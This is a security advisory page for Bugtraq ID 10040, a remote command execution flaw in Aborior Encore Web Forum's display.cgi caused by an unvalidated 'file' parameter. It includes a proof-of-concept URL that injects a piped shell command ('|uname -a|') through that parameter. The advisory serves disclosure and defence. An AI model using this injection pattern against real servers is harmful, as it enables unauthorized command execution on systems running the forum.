Aborior Encore Web Forum Remote Arbitrary Command Execution Vulnerability
BID:10040
Info
Aborior Encore Web Forum Remote Arbitrary Command Execution Vulnerability
| Bugtraq ID: | 10040 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 03 2004 12:00AM |
| Updated: | Jun 21 2006 09:25PM |
| Credit: | Discovery of this issue is credited to k-159. |
| Vulnerable: |
Aborior Encore Web Forum |
| Not Vulnerable: | |
Discussion
Aborior Encore Web Forum Remote Arbitrary Command Execution Vulnerability
Encore Web Forum is reported prone to an issue that may allow a remote user to execute arbitrary commands on a system implementing the forum software. This issue is due to the application's failure to properly validate user-supplied URI input.
A remote attacker may exploit this condition to execute arbitrary commands in the context of the webserver that is hosting the vulnerable application.
Encore Web Forum is reported prone to an issue that may allow a remote user to execute arbitrary commands on a system implementing the forum software. This issue is due to the application's failure to properly validate user-supplied URI input.
A remote attacker may exploit this condition to execute arbitrary commands in the context of the webserver that is hosting the vulnerable application.
Exploit / POC
Aborior Encore Web Forum Remote Arbitrary Command Execution Vulnerability
The following proof of concept has been provided:
http://www.target.com/encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=|uname -a|
The following proof of concept has been provided:
http://www.target.com/encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=|uname -a|
Solution / Fix
References
Aborior Encore Web Forum Remote Arbitrary Command Execution Vulnerability
References:
References:
- Encore Web Forum Home Page (Aborior)
- display.cgi ([email protected])
- Remote Exploit for Aborior's Encore Web Forum ("XNUXER RESEARCH"
)